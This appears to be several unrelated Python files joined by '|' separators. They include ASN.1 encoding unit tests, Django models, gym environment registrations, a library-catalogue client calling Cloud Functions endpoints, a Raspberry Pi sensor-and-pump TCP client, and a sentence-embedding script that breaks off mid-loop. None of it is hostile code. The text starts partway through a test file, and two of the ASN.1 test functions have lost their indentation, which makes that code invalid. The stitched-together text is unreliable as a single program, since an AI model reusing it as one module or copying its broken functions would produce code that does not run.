        SeqChoiceOldApi(('one', a, None))

def test_load_invalid_choice(self):
    """Input matching no alternative's tag raises ValueError."""
    with self.assertRaises(ValueError):
        NumChoice.load(b'\x02\x01\x00')
    with self.assertRaises(ValueError):
        NumChoiceOldApi.load(b'\x02\x01\x00')

def test_fix_tagging_choice(self):
    """The Choice re-tags a value whose tagging mismatches the alternative."""
    correct = core.Integer(200, explicit=2)
    choice = NumChoice(
        name='three',
        value=core.Integer(200, explicit=1)
    )
    self.assertEqual(correct.dump(), choice.dump())
    self.assertEqual(correct.explicit, choice.chosen.explicit)
    choice2 = NumChoiceOldApi(
        name='three',
        value=core.Integer(200, explicit=1)
    )
    self.assertEqual(correct.dump(), choice2.dump())
    self.assertEqual(correct.explicit, choice2.chosen.explicit)

def test_copy_choice_mutate(self):
    """Mutating a copied Choice's chosen value must not affect the copy."""
    a = CopySeq({'name': 'foo', 'pair': {'id': '1.2.3', 'value': 5}})
    choice = SeqChoice(
        name='one',
        value=a
    )
    choice.dump()
    choice_copy = choice.copy()
    choice.chosen['name'] = 'bar'
    self.assertNotEqual(choice.chosen['name'], choice_copy.chosen['name'])
    choice2 = SeqChoiceOldApi(
        name='one',
        value=a
    )
    choice2.dump()
    choice2_copy = choice2.copy()
    choice2.chosen['name'] = 'bar'
    self.assertNotEqual(choice2.chosen['name'], choice2_copy.chosen['name'])
def test_dump_ber_indefinite(self):
    """dump() re-encodes indefinite-length BER to DER only at the top level."""
    # A simple primitive type that is indefinite-length-encoded will be
    # automatically re-encoded to DER encoding
    data = b'\x2C\x80\x0C\x03foo\x00\x00'
    v = core.UTF8String.load(data)
    self.assertEqual(True, v._indefinite)
    self.assertEqual('foo', v.native)
    self.assertEqual(b'\x0C\x03foo', v.dump())
    # In this case the indefinite length items are nested, and the
    # top-level item is fixed-length, so it won't get automatically
    # re-encoded
    data = b'\x30\x0d\x30\x80\x2C\x80\x0C\x03foo\x00\x00\x00\x00'
    v = NestedUTF8Sequence.load(data)
    self.assertEqual(data, v.dump())
    # Here both the top-level and the nested encoding will get fixed since
    # the top-level being indefinitely triggers a full re-encoding
    data = b'\x30\x80\x30\x09\x2C\x80\x0C\x03foo\x00\x00\x00\x00'
    v = NestedUTF8Sequence.load(data)
    self.assertEqual(b'\x30\x07\x30\x05\x0C\x03foo', v.dump())

def test_copy_indefinite(self):
    """copy() of an indefinite-length value yields a definite-length (DER) copy.

    Exercised across every string/bit-string flavor: method becomes
    primitive (0), _indefinite becomes False, and dump() is DER.
    """
    v = core.BitString.load(b'\x23\x80\x03\x02\x00\x04\x00\x00')
    self.assertEqual(True, v._indefinite)
    v2 = v.copy()
    self.assertEqual(0, v2.method)
    self.assertEqual(3, v2.tag)
    self.assertEqual(False, v2._indefinite)
    self.assertEqual((0, 0, 0, 0, 0, 1, 0, 0), v2.native)
    self.assertEqual(b'\x03\x02\x00\x04', v2.dump())
    v = core.OctetBitString.load(b'\x23\x80\x03\x02\x00\x04\x00\x00')
    self.assertEqual(True, v._indefinite)
    v2 = v.copy()
    self.assertEqual(0, v2.method)
    self.assertEqual(3, v2.tag)
    self.assertEqual(False, v2._indefinite)
    self.assertEqual(b'\x04', v2.native)
    self.assertEqual(b'\x03\x02\x00\x04', v2.dump())
    v = core.ParsableOctetBitString.load(b'\x23\x80\x03\x04\x00\x02\x01\x04\x00\x00')
    self.assertEqual(4, v.parsed.native)
    self.assertEqual(True, v._indefinite)
    v2 = v.copy()
    self.assertEqual(0, v2.method)
    self.assertEqual(3, v2.tag)
    self.assertEqual(False, v2._indefinite)
    self.assertEqual(4, v2.parsed.native)
    self.assertEqual(b'\x03\x04\x00\x02\x01\x04', v2.dump())
    v = core.IntegerBitString.load(b'\x23\x80\x03\x02\x00\x04\x00\x00')
    self.assertEqual(True, v._indefinite)
    v2 = v.copy()
    self.assertEqual(0, v2.method)
    self.assertEqual(3, v2.tag)
    self.assertEqual(False, v2._indefinite)
    self.assertEqual(4, v2.native)
    self.assertEqual(b'\x03\x02\x00\x04', v2.dump())
    v = core.OctetString.load(b'\x24\x80\x04\x03foo\x00\x00')
    self.assertEqual(True, v._indefinite)
    v2 = v.copy()
    self.assertEqual(0, v2.method)
    self.assertEqual(4, v2.tag)
    self.assertEqual(False, v2._indefinite)
    self.assertEqual(b'foo', v2.native)
    self.assertEqual(b'\x04\x03foo', v2.dump())
    v = core.IntegerOctetString.load(b'\x24\x80\x04\x01\x04\x00\x00')
    self.assertEqual(True, v._indefinite)
    v2 = v.copy()
    self.assertEqual(0, v2.method)
    self.assertEqual(4, v2.tag)
    self.assertEqual(False, v2._indefinite)
    self.assertEqual(4, v2.native)
    self.assertEqual(b'\x04\x01\x04', v2.dump())
    v = core.ParsableOctetString.load(b'\x24\x80\x04\x03\x02\x01\x04\x00\x00')
    self.assertEqual(4, v.parsed.native)
    self.assertEqual(True, v._indefinite)
    v2 = v.copy()
    self.assertEqual(0, v2.method)
    self.assertEqual(4, v2.tag)
    self.assertEqual(False, v2._indefinite)
    self.assertEqual(4, v2.parsed.native)
    self.assertEqual(b'\x02\x01\x04', v2.__bytes__())
    self.assertEqual(b'\x04\x03\x02\x01\x04', v2.dump())
    v = core.UTF8String.load(b'\x2C\x80\x0C\x03foo\x00\x00')
    self.assertEqual(True, v._indefinite)
    v2 = v.copy()
    self.assertEqual(0, v2.method)
    self.assertEqual(12, v2.tag)
    self.assertEqual(False, v2._indefinite)
    self.assertEqual('foo', v2.native)
    self.assertEqual(b'\x0C\x03foo', v2.dump())
def test_concat(self):
    """A Concat exposes its children by index and dumps them back-to-back."""
    child1 = Seq({
        'id': '1.2.3',
        'value': 1
    })
    child2 = core.Integer(0)
    parent = ConcatTest([
        child1,
        child2
    ])
    self.assertEqual(child1, parent[0])
    self.assertEqual(child2, parent[1])
    self.assertEqual(child1.dump() + child2.dump(), parent.dump())

def test_oid_map_unmap(self):
    """map()/unmap() translate between dotted and friendly names; unknown dotted values pass through."""
    self.assertEqual('abc', MyOids.map('1.2.3'))
    self.assertEqual('def', MyOids.map('4.5.6'))
    self.assertEqual('7.8.9', MyOids.map('7.8.9'))
    self.assertEqual('1.2.3', MyOids.unmap('abc'))
    self.assertEqual('4.5.6', MyOids.unmap('def'))
    self.assertEqual('7.8.9', MyOids.unmap('7.8.9'))
    with self.assertRaises(ValueError):
        # A non-dotted string that is not in _map cannot be unmapped.
        MyOids.unmap('no_such_mapping')

def test_oid_dotted_native(self):
    """native returns the mapped name; dotted always returns the OID string."""
    self.assertEqual('abc', MyOids('1.2.3').native)
    self.assertEqual('1.2.3', MyOids('1.2.3').dotted)
    self.assertEqual('abc', MyOids('abc').native)
    self.assertEqual('1.2.3', MyOids('abc').dotted)

def test_dump_set(self):
    """SET members are emitted sorted by tag, not field order."""
    st = SetTest({'two': 2, 'one': 1})
    self.assertEqual(b'1\x06\x81\x01\x01\x82\x01\x02', st.dump())

def test_dump_set_of(self):
    """SET OF members are emitted sorted by encoding."""
    st = SetOfTest([3, 2, 1])
    self.assertEqual(b'1\x09\x02\x01\x01\x02\x01\x02\x02\x01\x03', st.dump())

def test_indefinite_length_octet_string(self):
    """Chunked indefinite-length OCTET STRING is joined into one value."""
    data = b'$\x80\x04\x02\x01\x01\x04\x01\x01\x00\x00'
    a = core.OctetString.load(data)
    self.assertEqual(b'\x01\x01\x01', a.native)
    self.assertEqual(b'\x01\x01\x01', a.__bytes__())
    self.assertEqual(1, a.method)
    # Test copying moves internal state
    self.assertEqual(a._bytes, a.copy()._bytes)

def test_indefinite_length_octet_string_2(self):
    """Two larger chunks are also joined correctly."""
    data = b'$\x80\x04\r\x8d\xff\xf0\x98\x076\xaf\x93nB:\xcf\xcc\x04\x15' \
        b'\x92w\xf7\xf0\xe4y\xff\xc7\xdc3\xb2\xd0={\x1a\x18mDr\xaaI\x00\x00'
    a = core.OctetString.load(data)
    self.assertEqual(
        b'\x8d\xff\xf0\x98\x076\xaf\x93nB:\xcf\xcc\x92w\xf7\xf0\xe4y\xff\xc7\xdc3\xb2\xd0={\x1a\x18mDr\xaaI',
        a.native
    )

def test_nested_indefinite_length_octet_string(self):
    """Indefinite encodings nested three deep still flatten to the payload."""
    data = b'\x24\x80\x24\x80\x24\x80\x04\x00\x00\x00\x00\x00\x00\x00'
    a = core.load(data)
    self.assertEqual(b'', a.native)
    self.assertEqual(b'', a.__bytes__())
    self.assertEqual(1, a.method)
    self.assertEqual(b'\x04\x00', a.dump(force=True))
    # Test copying moves internal state
    self.assertEqual(a._bytes, a.copy()._bytes)

def test_indefinite_length_integer_octet_string(self):
    """Chunked OCTET STRING interpreted as a big-endian integer."""
    data = b'$\x80\x04\x02\x01\x01\x04\x01\x01\x00\x00'
    a = core.IntegerOctetString.load(data)
    # 0x010101 == 65793
    self.assertEqual(65793, a.native)
    self.assertEqual(1, a.method)
    self.assertEqual(b'\x01\x01\x01', a.cast(core.OctetString).native)

def test_indefinite_length_parsable_octet_string(self):
    """Chunked ParsableOctetString re-parses its joined payload."""
    data = b'$\x80\x04\x02\x04\x01\x04\x01\x01\x00\x00'
    a = core.ParsableOctetString.load(data)
    self.assertEqual(b'\x04\x01\x01', a.parsed.dump())
    self.assertEqual(b'\x04\x01\x01', a.__bytes__())
    self.assertEqual(1, a.method)
    self.assertEqual(b'\x01', a.parsed.native)
    self.assertEqual(b'\x01', a.native)
    self.assertEqual(b'\x04\x01\x01', a.cast(core.OctetString).native)
    # Test copying moves internal state
    self.assertEqual(a._bytes, a.copy()._bytes)
    self.assertEqual(a._parsed, a.copy()._parsed)
def test_indefinite_length_utf8string(self):
    """Chunked UTF8String joins to one text value and re-dumps as DER."""
    data = b'\x2C\x80\x0C\x02\x61\x62\x0C\x01\x63\x00\x00'
    a = core.UTF8String.load(data)
    self.assertEqual('abc', a.native)
    self.assertEqual('abc', a.__unicode__())
    self.assertEqual(1, a.method)
    # Ensure a forced re-encoding is proper DER
    self.assertEqual(b'\x0C\x03\x61\x62\x63', a.dump(force=True))
    # Test copying moves internal state
    self.assertEqual(a._unicode, a.copy()._unicode)

def test_indefinite_length_bit_string(self):
    """Chunked BIT STRINGs concatenate, honoring trailing unused bits."""
    data = b'#\x80\x03\x02\x00\x01\x03\x02\x02\x04\x00\x00'
    a = core.BitString.load(data)
    self.assertEqual((0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1), a.native)
    self.assertEqual((0, 0), a.unused_bits)
    # Example from X.690 §8.6.4.2
    prim = core.BitString.load(b'\x03\x07\x04\x0A\x3B\x5F\x29\x1C\xD0')
    self.assertEqual((0, 0, 0, 0), prim.unused_bits)
    indef = core.BitString.load(b'\x23\x80\x03\x03\x00\x0a\x3b\x03\x05\x04\x5f\x29\x1c\xd0\x00\x00')
    self.assertEqual(prim.native, indef.native)
    self.assertEqual(core._int_to_bit_tuple(0x0A3B5F291CD, 44), indef.native)
    self.assertEqual((0, 0, 0, 0), indef.unused_bits)
    # Same value but with nonzero padding bits in the final chunk.
    unused = core.BitString.load(b'\x23\x80\x03\x03\x00\x0a\x3b\x03\x05\x04\x5f\x29\x1c\xdd\x00\x00')
    self.assertEqual(indef.native, unused.native)
    self.assertEqual((1, 1, 0, 1), unused.unused_bits)
    # Re-setting the value clears the unused padding.
    unused.set(indef.native)
    self.assertEqual(indef.native, unused.native)
    self.assertEqual((0, 0, 0, 0), unused.unused_bits)

def test_integer_bit_string(self):
    """IntegerBitString exposes value and unused bits; set() normalizes."""
    a = core.IntegerBitString.load(b'\x03\x02\x04\xcb')
    self.assertEqual(12, a.native)
    self.assertEqual((1, 0, 1, 1), a.unused_bits)
    b = a.copy()
    self.assertEqual(12, b.native)
    self.assertEqual((1, 0, 1, 1), b.unused_bits)
    a.set(56)
    self.assertEqual((), a.unused_bits)
    self.assertEqual(56, a.native)
    self.assertEqual(b'\x03\x02\x00\x38', a.dump())
    with self.assertRaises(TypeError):
        a.set('badtype')
    with self.assertRaises(ValueError):
        core.IntegerBitString(-1)

def test_indefinite_length_integer_bit_string(self):
    """Chunked BIT STRING chunks concatenate into one integer value."""
    data = b'#\x80\x03\x02\x00\x01\x03\x02\x00\x04\x00\x00'
    a = core.IntegerBitString.load(data)
    self.assertEqual(260, a.native)
    self.assertEqual((), a.unused_bits)
    # Zero chunks yields zero.
    a = core.IntegerBitString.load(b'\x23\x80\x00\x00')
    self.assertEqual(0, a.native)
    self.assertEqual((), a.unused_bits)
    a = core.IntegerBitString.load(b'\x23\x80\x03\x01\x00\x03\x03\x03\x03\x03\x00\x00')
    self.assertEqual(96, a.native)
    self.assertEqual((0, 1, 1), a.unused_bits)
    a.set(56)
    self.assertEqual((), a.unused_bits)
    self.assertEqual(56, a.native)
    self.assertEqual(b'\x03\x02\x00\x38', a.dump())

@data('bit_string_error_values')
def integer_bit_string_errors(self, enc_bytes):
    """The malformed-BIT-STRING inputs also fail for IntegerBitString."""
    with self.assertRaises(ValueError):
        core.IntegerBitString.load(enc_bytes).native
def test_octet_bit_string(self):
a = core.OctetBitString.load(b'\x03\x02\x04\xcb')
self.assertEqual(b'\xc0', a.native)
self.assertEqual((1, 0, 1, 1), a.unused_bits)
a.set(b'\x38')
self.assertEqual((), a.unused_bits)
self.assertEqual(b'\x38', a.native)
self.assertEqual(b'\x03\x02\x00\x38', a.dump())
with self.assertRaises(TypeError):
a.set('badtype')
def test_indefinite_length_octet_bit_string(self):
data = b'#\x80\x03\x02\x00\x01\x03\x02\x00\x04\x00\x00'
a = core.OctetBitString.load(data)
self.assertEqual(b'\x01\x04', a.native)
self.assertEqual(b'\x01\x04', a.__bytes__())
# Test copying moves internal state
self.assertEqual(a._bytes, a.copy()._bytes)
# octet bit string with unused bits
a = core.OctetBitString.load(b'\x23\x80\x03\x05\x05\x74\x65\x73\x74\x00\x00')
self.assertEqual(b'\x74\x65\x73\x60', a.native)
self.assertEqual((1, 0, 1, 0, 0), a.unused_bits)
a.set(b'\x38')
self.assertEqual((), a.unused_bits)
self.assertEqual(b'\x38', a.native)
self.assertEqual(b'\x03\x02\x00\x38', a.dump())
@data('bit_string_error_values')
def octet_bit_string_errors(self, enc_bytes):
    """Each malformed encoding from the fixture list must raise ValueError on parse."""
    with self.assertRaises(ValueError):
        core.OctetBitString.load(enc_bytes).native
def test_indefinite_length_parsable_octet_bit_string(self):
    """ParsableOctetBitString re-parses its payload as an inner ASN.1 value."""
    data = b'#\x80\x03\x03\x00\x0C\x02\x03\x03\x00\x61\x62\x00\x00'
    a = core.ParsableOctetBitString.load(data)
    self.assertEqual(b'\x0C\x02\x61\x62', a.parsed.dump())
    self.assertEqual(b'\x0C\x02\x61\x62', a.__bytes__())
    self.assertEqual('ab', a.parsed.native)
    self.assertEqual('ab', a.native)
    # Test copying moves internal state
    self.assertEqual(a._bytes, a.copy()._bytes)
    self.assertEqual(a._parsed, a.copy()._parsed)
    with self.assertRaises(ValueError):
        # parsable octet bit string with unused bits
        core.ParsableOctetBitString.load(b'\x23\x80\x03\x03\x04\x02\x00\x03\x03\x04\x12\xa0\x00\x00').native
def test_integer_octet_string(self):
    """IntegerOctetString accepts non-negative ints only."""
    v = core.IntegerOctetString(10)
    self.assertEqual(10, v.native)
    # Strings are rejected by type, negatives by value
    with self.assertRaises(TypeError):
        core.IntegerOctetString('0')
    with self.assertRaises(ValueError):
        core.IntegerOctetString(-1)
def test_explicit_application_tag(self):
    """An explicitly tagged [APPLICATION 10] INTEGER parses and re-dumps as DER."""
    data = b'\x6a\x81\x03\x02\x01\x00'
    ati = ApplicationTaggedInteger.load(data)
    self.assertEqual(((1, 10),), ati.explicit)
    self.assertEqual(0, ati.class_)
    self.assertEqual(2, ati.tag)
    self.assertEqual(0, ati.native)
    # The output encoding is DER, whereas the input was not, so
    # the length encoding changes from long form to short form
    self.assertEqual(b'\x6a\x03\x02\x01\x00', ati.dump(force=True))
def test_required_field(self):
    """Dumping a Sequence missing a mandatory field must raise ValueError."""
    with self.assertRaisesRegex(ValueError, '"id" is missing from structure'):
        Seq({'value': core.Integer(5)}).dump()
def test_explicit_application_tag_nested(self):
    """Nested explicit application/context tags must round-trip through dump()."""
    # tag = [APPLICATION 10] constructed; length = 18
    #  OUTER SEQUENCE: tag = [UNIVERSAL 16] constructed; length = 16
    #   outernumber : tag = [11] constructed; length = 3
    #    INTEGER: tag = [UNIVERSAL 2] primitive; length = 1
    #     23
    #   inner : tag = [12] constructed; length = 9
    #    tag = [APPLICATION 20] constructed; length = 7
    #     INNER SEQUENCE: tag = [UNIVERSAL 16] constructed; length = 5
    #      innernumber : tag = [21] constructed; length = 3
    #       INTEGER: tag = [UNIVERSAL 2] primitive; length = 1
    #        42
    der = (
        b'\x6A\x12\x30\x10\xAB\x03\x02\x01\x17\xAC\x09\x74'
        b'\x07\x30\x05\xB5\x03\x02\x01\x2A'
    )
    ato = ApplicationTaggedOuter.load(der)
    self.assertEqual(((1, 10),), ato.explicit)
    self.assertEqual(0, ato.class_)
    self.assertEqual(16, ato.tag)
    self.assertEqual(1, ato.method)
    onum = ato['outernumber']
    self.assertEqual(((2, 11),), onum.explicit)
    self.assertEqual(0, onum.class_)
    self.assertEqual(2, onum.tag)
    self.assertEqual(0, onum.method)
    self.assertEqual(23, onum.native)
    ati = ato['inner']
    self.assertEqual(((1, 20), (2, 12)), ati.explicit)
    self.assertEqual(0, ati.class_)
    self.assertEqual(16, ati.tag)
    self.assertEqual(util.OrderedDict([('innernumber', 42)]), ati.native)
    inum = ati['innernumber']
    self.assertEqual(((2, 21),), inum.explicit)
    self.assertEqual(0, inum.class_)
    self.assertEqual(2, inum.tag)
    self.assertEqual(0, inum.method)
    self.assertEqual(42, inum.native)
    # Full round trip back to the original DER bytes
    self.assertEqual(der, ato.dump(force=True))
def test_sequence_choice_field_by_tuple(self):
    """A Choice field can be initialized with a (name, value) tuple."""
    val = ExplicitField({'field': ('one', 32)})
    self.assertEqual('one', val['field'].name)
    self.assertEqual(32, val['field'].chosen.native)
def test_sequence_choice_field_by_dict(self):
    """A Choice field can be initialized with a single-key {name: value} dict."""
    val = ExplicitField({'field': {'two': 32}})
    self.assertEqual('two', val['field'].name)
    self.assertEqual(32, val['field'].chosen.native)
def test_nested_explicit_tag_choice(self):
    """Nested Choice parsing must not duplicate header bytes."""
    # Explicitly tagged values have a _header that contains
    # the explicit tag and the header for the contained value.
    # When parsing nested Choice values, it is necessary to not pull
    # up the next Choice value's header, since Choice values
    # themselves don't have their own header and it will result in
    # duplication.
    data = b'\x30\x09\x03\x01\x00\xa0\x04\xa2\x02\x80\x00'
    image_data = SpcPeImageData.load(data, strict=True)
    self.assertEqual(data[2:5], image_data['flags'].dump())
    self.assertEqual(data[5:11], image_data['file'].dump())
    self.assertEqual(data[5:7], image_data['file']._header)
    self.assertEqual(data[7:11], image_data['file'].chosen.dump())
    self.assertEqual(data[7:9], image_data['file'].chosen._header)
    self.assertEqual(data[9:11], image_data['file'].chosen.chosen.dump())
    self.assertEqual(data[9:11], image_data['file'].chosen.chosen._header)
    # Same expectations when forcing a re-encode via dump(True)
    image_data2 = SpcPeImageData.load(data, strict=True)
    self.assertEqual(data[2:5], image_data2['flags'].dump(True))
    self.assertEqual(data[5:11], image_data2['file'].dump(True))
    self.assertEqual(data[5:7], image_data2['file']._header)
    self.assertEqual(data[7:11], image_data2['file'].chosen.dump(True))
    self.assertEqual(data[7:9], image_data2['file'].chosen._header)
    self.assertEqual(data[9:11], image_data2['file'].chosen.chosen.dump(True))
    self.assertEqual(data[9:11], image_data2['file'].chosen.chosen._header)
def test_choice_dump_header_native(self):
    """A Choice itself has an empty _header; the chosen value carries the tag bytes."""
    s = SpcString({'unicode': 'test'})
    self.assertEqual(b'\x80\x08\x00t\x00e\x00s\x00t', s.dump())
    self.assertEqual(b'', s._header)
    self.assertEqual('test', s.native)
    self.assertEqual(b'\x80\x08', s.chosen._header)
    self.assertEqual('test', s.chosen.native)
    # Same invariants one level deeper, through a nested Choice
    link = SpcLink('file', {'unicode': 'test'})
    self.assertEqual(b'\xa2\x0a\x80\x08\x00t\x00e\x00s\x00t', link.dump())
    self.assertEqual(b'', link._header)
    self.assertEqual('test', link.native)
    self.assertEqual(b'\xa2\x0a', link.chosen._header)
    self.assertEqual('test', link.chosen.native)
    self.assertEqual(b'\x80\x08', link.chosen.chosen._header)
    self.assertEqual('test', link.chosen.chosen.native)
def test_parse_broken_sequence_fields_repeatedly(self):
    """Accessing .native on a broken Sequence must raise every time, not just once."""
    s = Seq.load(b'\x30\x06\x88\x00\x00\x00\x00\x00')
    with self.assertRaises(ValueError):
        s.native
    with self.assertRaises(ValueError):
        s.native
def test_parse_broken_sequenceof_children_repeatedly(self):
    """Accessing .native on a broken SequenceOf must raise every time, not just once."""
    s = SequenceOfInts.load(b'\x30\x06\x88\x00\x00\x00\x00\x00')
    with self.assertRaises(ValueError):
        s.native
    with self.assertRaises(ValueError):
        s.native
def test_wrong_asn1value(self):
    """A Sequence field given a plain int instead of an Asn1Value must raise TypeError."""
    with self.assertRaises(TypeError):
        Seq({
            'id': core.Integer(1),
            'value': 1
        })
def test_wrong_asn1value2(self):
    """A field given an Asn1Value of the wrong spec must raise TypeError."""
    with self.assertRaises(TypeError):
        CopySeq({
            'name': core.UTF8String('Test'),
            'pair': core.Integer(1)
        })
def test_wrong_asn1value3(self):
    """A wrongly-typed value inside a nested Any structure must raise TypeError."""
    with self.assertRaises(TypeError):
        NestSeqAny({
            'id': '3.4.5',
            'value': core.Integer(1)
        })
def test_wrong_asn1value4(self):
    """A wrongly-typed value inside an explicitly tagged structure must raise TypeError."""
    with self.assertRaises(TypeError):
        NestSeqExplicit({
            'id': '3.4.5',
            'value': core.Integer(1)
        })
def test_integer_octet_string_encoded_width(self):
    """set_encoded_width() zero-pads the OCTET STRING content to a fixed byte width."""
    a = core.IntegerOctetString(1)
    self.assertEqual(1, a.native)
    self.assertEqual(b'\x04\x01\x01', a.dump())
    # Same value, but forced to 4 content bytes
    b = core.IntegerOctetString(1)
    b.set_encoded_width(4)
    self.assertEqual(1, b.native)
    self.assertEqual(b'\x04\x04\x00\x00\x00\x01', b.dump())
|
# -*- coding: utf-8 -*-
import numpy as np
def generateNumberArray(N_spins, max_n_spins_in_basket):
    """Draw one random basket state per basket of spins.

    The N_spins spins are split into baskets of at most
    max_n_spins_in_basket spins; each full basket contributes a random
    integer in [0, 2**max_n_spins_in_basket) and a final partial basket
    (if any) contributes a random integer in [0, 2**remainder).

    BUG FIX: the original used Python-2 integer division (`/`), which
    produces floats on Python 3 and makes `range()` raise TypeError.
    `divmod` with floor division keeps the original Python-2 semantics
    and replaces the convoluted tuple-indexing basket count.

    :param N_spins: total number of spins (non-negative int)
    :param max_n_spins_in_basket: maximum spins per basket (positive int)
    :return: list of random basket integers
    """
    full_baskets, remainder = divmod(N_spins, max_n_spins_in_basket)
    numberArray = [np.random.randint(2 ** max_n_spins_in_basket)
                   for _ in range(full_baskets)]
    if remainder:
        # Partial last basket only has `remainder` spins
        numberArray.append(np.random.randint(2 ** remainder))
    return numberArray
# testing
#N_spins = 10
#max_n_spins_in_basket=4
#numberArray = generateNumberArray(N_spins, max_n_spins_in_basket)
#print numberArray |
from django.db import models
# Create your models here.
class Student(models.Model):
    """A student with basic demographic fields."""
    name = models.CharField(max_length=10)
    age = models.IntegerField()
    sex = models.CharField(max_length=10)
    def __str__(self):
        """Display students by name in the admin and shell."""
        return self.name
class Course(models.Model):
    """A course identified only by its name."""
    name = models.CharField(max_length=10)
    def __str__(self):
        """Display courses by name in the admin and shell."""
        return self.name
|
# coding: utf-8
"""Training tools subpackage."""
# Public names re-exported by the training subpackage.
__all__ = [
    'Manager',
    'Updater',
    'ScatterPlot',
    'set_log_scale',
]
from hdnnpy.training.extensions import (ScatterPlot,
set_log_scale,
)
from hdnnpy.training.manager import Manager
from hdnnpy.training.updater import Updater
|
from collections import Counter
class P8XMatrixTransformation:
    """Decide whether one matrix can be rearranged into another."""

    def solve(self, original, target):
        """Return "YES" when both matrices hold the same multiset of cells, else "NO"."""
        def tally(rows):
            # Count every cell value across all rows of the matrix.
            counts = Counter()
            for row in rows:
                counts.update(row)
            return counts

        return "YES" if tally(original) == tally(target) else "NO"
|
"""
Please contact the author(s) of this library if you have any questions.
Authors: Kai-Chieh Hsu ( kaichieh@princeton.edu )
Vicenc Rubies Royo ( vrubies@berkeley.edu )
"""
from gym.envs.registration import register
# Two-player lunar lander reachability game.
register(
    id="multi_player_lunar_lander_reachability-v0", entry_point=(
        "gym_reachability.gym_reachability.envs:"
        + "MultiPlayerLunarLanderReachability"
    )
)
# Single-player lunar lander reach-avoid variant.
register(
    id="one_player_reach_avoid_lunar_lander-v0", entry_point=(
        "gym_reachability.gym_reachability.envs:"
        + "OnePlayerReachAvoidLunarLander"
    )
)
# Single Dubins car environment.
register(
    id="dubins_car-v1",
    entry_point="gym_reachability.gym_reachability.envs:DubinsCarOneEnv"
)
# Dubins car pursuit-evasion environment.
register(
    id="dubins_car_pe-v0",
    entry_point="gym_reachability.gym_reachability.envs:DubinsCarPEEnv"
)
# Point mass environment.
register(
    id="point_mass-v0",
    entry_point="gym_reachability.gym_reachability.envs:PointMassEnv"
)
# Zermelo navigation demo environment.
register(
    id="zermelo_show-v0",
    entry_point="gym_reachability.gym_reachability.envs:ZermeloShowEnv"
)
|
"""Helper functions for logging purposes."""
__all__ = ["log_function_code"]
from typing import Callable
import inspect
def log_function_code(func_to_log: Callable) -> str:
    """
    Extracts function code into str.

    It is used for preparing functions code to be logged into external files.

    :param func_to_log: Function object for which code to be extracted.
    :return: Code of the function.
    :raises TypeError: If ``func_to_log`` is not callable.
    """
    if not callable(func_to_log):
        # BUG FIX: the original constructed the TypeError but never raised it,
        # so non-callables fell through to inspect.getsource with a confusing error.
        raise TypeError(f"Parameter 'func_to_log' is not function. Actual value: {func_to_log}.")
    function_definition = inspect.getsource(func_to_log)
    if function_definition.startswith("return "):
        # presumably strips the keyword when the source was captured from a
        # `return lambda ...` line — TODO confirm the intended case
        function_definition = function_definition[7:]
    return repr(function_definition.strip())
|
import requests
import json
from library import *
def showAll(self):
    """Fetch every book record from the backend and display it."""
    response = requests.get(
        'https://us-central1-kcc-library.cloudfunctions.net/showAll')
    showData(self, response.json())
def showAvailables(self):
    """Fetch only the currently borrowable books and display them."""
    response = requests.get(
        'https://us-central1-kcc-library.cloudfunctions.net/showAvailables')
    showData(self, response.json())
def showNotAvailables(self):
    """Fetch only the currently borrowed books and display them."""
    response = requests.get(
        'https://us-central1-kcc-library.cloudfunctions.net/showNotAvailables')
    showData(self, response.json())
def searchByTitle(self, title):
    """Search the catalog by title and display the matches."""
    response = requests.get(
        url='https://us-central1-kcc-library.cloudfunctions.net/searchByTitle',
        params={'title': title},
    )
    showData(self, response.json())
def searchByAuthor(self, author):
    """Search the catalog by author and display the matches."""
    response = requests.get(
        url='https://us-central1-kcc-library.cloudfunctions.net/searchByAuthor',
        params={'author': author},
    )
    showData(self, response.json())
def searchByPublisher(self, publisher):
    """Search the catalog by publisher and display the matches."""
    response = requests.get(
        url='https://us-central1-kcc-library.cloudfunctions.net/searchByPublisher',
        params={'publisher': publisher},
    )
    showData(self, response.json())
def borrow(self, title):
    """Request to borrow the book *title*; return a user-facing status message."""
    response = requests.get(
        url='https://us-central1-kcc-library.cloudfunctions.net/borrow',
        params={'title': title},
    )
    outcome = response.json()
    # result == 1 signals the backend accepted the loan
    return "대여가 완료되었어요!" if outcome['result'] == 1 else "대여에 실패했어요"
def giveBack(self, title):
    """Request to return the book *title*; return a user-facing status message."""
    response = requests.get(
        url='https://us-central1-kcc-library.cloudfunctions.net/giveBack',
        params={'title': title},
    )
    outcome = response.json()
    # result == 1 signals the backend accepted the return
    return "반납이 완료되었어요!" if outcome['result'] == 1 else "반납에 실패했어요"
def showData(self, result):
    """Fill the UI result table from a dict of book records.

    Columns: 0 = title, 1 = author, 2 = publisher.
    """
    column_for = {'title': 0, 'author': 1, 'publisher': 2}
    self.result_text.setRowCount(len(result))
    for row, record in enumerate(result.values()):
        for field, column in column_for.items():
            if field in record:
                self.result_text.setItem(row, column, QTableWidgetItem(record[field]))
|
from socket import *
from time import *
from shumeipai.bme280 import get_temp_pressure_humidity_from_sensor
from shumeipai.power_control import blink
from shumeipai.soil_sensor import get_result_from_sensor
from shumeipai.settings import sensor_channel, ADDR, BUFSIZ
# Connect to the control server and stream sensor readings every 3 seconds.
tcpCliSock = socket(AF_INET, SOCK_STREAM)
tcpCliSock.connect(ADDR)
while True:
    sleep(3)
    # Read environment (BME280) and soil sensors.
    t1, t2, temperature, pressure, humidity = get_temp_pressure_humidity_from_sensor()
    dry_or_humid = get_result_from_sensor(sensor_channel)
    # data1 = ("Temperature : %f C, Pressure : %f hPa, Humidity : %f RH" % (temperature, pressure, humidity))
    # CSV payload: temperature,pressure,humidity,soil-state
    data1 = ("%.2f,%.2f,%.2f,%s" % (temperature, pressure, humidity, dry_or_humid))
    if not data1:
        break
    tcpCliSock.send(data1.encode())
    # Wait for the server's command reply.
    data1 = tcpCliSock.recv(BUFSIZ)
    if not data1:
        break
    command = data1.decode('utf-8')
    print(command)
    # "Watering<seconds>" drives the pump for the given duration.
    if command.startswith("Watering"):
        # NOTE(review): rebinding `time` shadows the star-imported time module
        # at module scope — confirm nothing else relies on that name afterwards.
        time = command[8:]
        print(time)
        blink(int(float(time)))
tcpCliSock.close()
|
from sentence_transformers import SentenceTransformer
import scipy.spatial
import numpy as np
import PrepareData
# Sentence encoder fine-tuned on STS-benchmark with a RoBERTa base.
embedder = SentenceTransformer('output/training_stsbenchmark_roberta-base-2020-06-20_15-58-09')
corpus = PrepareData.load_data()
# Corpus with example sentences
corpus_embeddings = []
for document in corpus:
    # A document embedding is the mean of its sentence embeddings.
